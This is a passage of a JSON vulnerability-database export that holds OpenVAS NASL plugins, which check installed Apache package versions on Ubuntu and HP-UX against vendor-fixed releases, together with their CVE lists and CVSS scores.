NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-common\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapr0-dev\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.0.55-4ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-common\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapr0-dev\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.0.55-4ubuntu4.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.4-3ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:02:42", "references": ["http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02579879", "02612"], "pluginID": "1361412562310835247", "description": "Check for the Version of Apache-based Web Server", "edition": 4, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2011-01-04T00:00:00", "title": "HP-UX Update for Apache-based Web Server HPSBUX02612", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2009-1955", "CVE-2007-6203", "CVE-2009-1890", "CVE-2009-0023", "CVE-2010-1452", "CVE-2009-1956", "CVE-2009-1891", "CVE-2009-1195"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310835247", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835247", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache-based Web Server HPSBUX02612\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Local information disclosure\n increase of privilege\n remote Denial of Service (DoS)\";\ntag_affected = \"Apache-based Web Server on\n HP-UX B.11.11, B.11.23 and B.11.31 running Apache-based Web Server prior to \n v2.0.63.01 HP-UX Apache-based Web Server v2.0.63.01 is contained in HP-UX \n Web Server Suite v.2.32\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX \n Apache-based Web Server. These vulnerabilities could be exploited locally to \n disclose information, increase privilege or remotely create a Denial of \n Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02579879\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835247\");\n script_version(\"$Revision: 9371 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:55:06 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-04 15:48:51 +0100 (Tue, 04 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02612\");\n script_cve_id(\"CVE-2010-1452\", \"CVE-2009-1956\", \"CVE-2009-1955\", \"CVE-2009-1891\", \"CVE-2009-1890\", \"CVE-2009-1195\", \"CVE-2009-0023\", \"CVE-2007-6203\", \"CVE-2006-3918\");\n script_name(\"HP-UX Update for Apache-based Web Server HPSBUX02612\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache-based Web Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:28", "references": ["02465", "http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01905287-1"], "pluginID": "1361412562310835224", "description": "Check for the Version of Apache-based Web Server", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-10-22T00:00:00", "type": "openvas", "title": "HP-UX Update for Apache-based Web Server HPSBUX02465", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3659", "CVE-2008-2939", "CVE-2006-3918", "CVE-2008-5625", "CVE-2008-2666", "CVE-2008-2364", "CVE-2007-6203", "CVE-2007-4465", "CVE-2008-2371", "CVE-2008-3658", "CVE-2008-2168", "CVE-2008-3660", "CVE-2008-0599", "CVE-2008-0005", "CVE-2008-5658", "CVE-2008-2829", "CVE-2008-5624", "CVE-2008-5498", "CVE-2008-5557", "CVE-2008-2665"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835224", "id": "OPENVAS:1361412562310835224", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache-based Web Server HPSBUX02465\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\n cross-site scripting (XSS)\n unauthorized access\";\ntag_affected = \"Apache-based Web Server on\n HP-UX B.11.23, B.11.31 running Apache-based Web Server versions before\n v2.2.8.05 HP-UX B.11.11, B.11.23, B.11.31 running Apache-based Web Server\n versions before v2.0.59.12\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running\n Apache-based Web Server. The vulnerabilities could be exploited remotely to\n cause a Denial of Service (DoS), cross-site scripting (XSS) or unauthorized\n access. Apache-based Web Server is contained in the Apache Web Server Suite.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01905287-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835224\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-22 15:43:41 +0200 (Thu, 22 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02465\");\n script_cve_id(\"CVE-2006-3918\", \"CVE-2007-4465\", \"CVE-2007-6203\", \"CVE-2008-0005\", \"CVE-2008-0599\", \"CVE-2008-2168\", \"CVE-2008-2364\", \"CVE-2008-2371\", \"CVE-2008-2665\", \"CVE-2008-2666\", \"CVE-2008-2829\", \"CVE-2008-2939\", \"CVE-2008-3658\", \"CVE-2008-3659\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2008-5624\", \"CVE-2008-5625\", \"CVE-2008-5658\");\n script_name(\"HP-UX Update for Apache-based Web Server HPSBUX02465\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache-based Web Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", 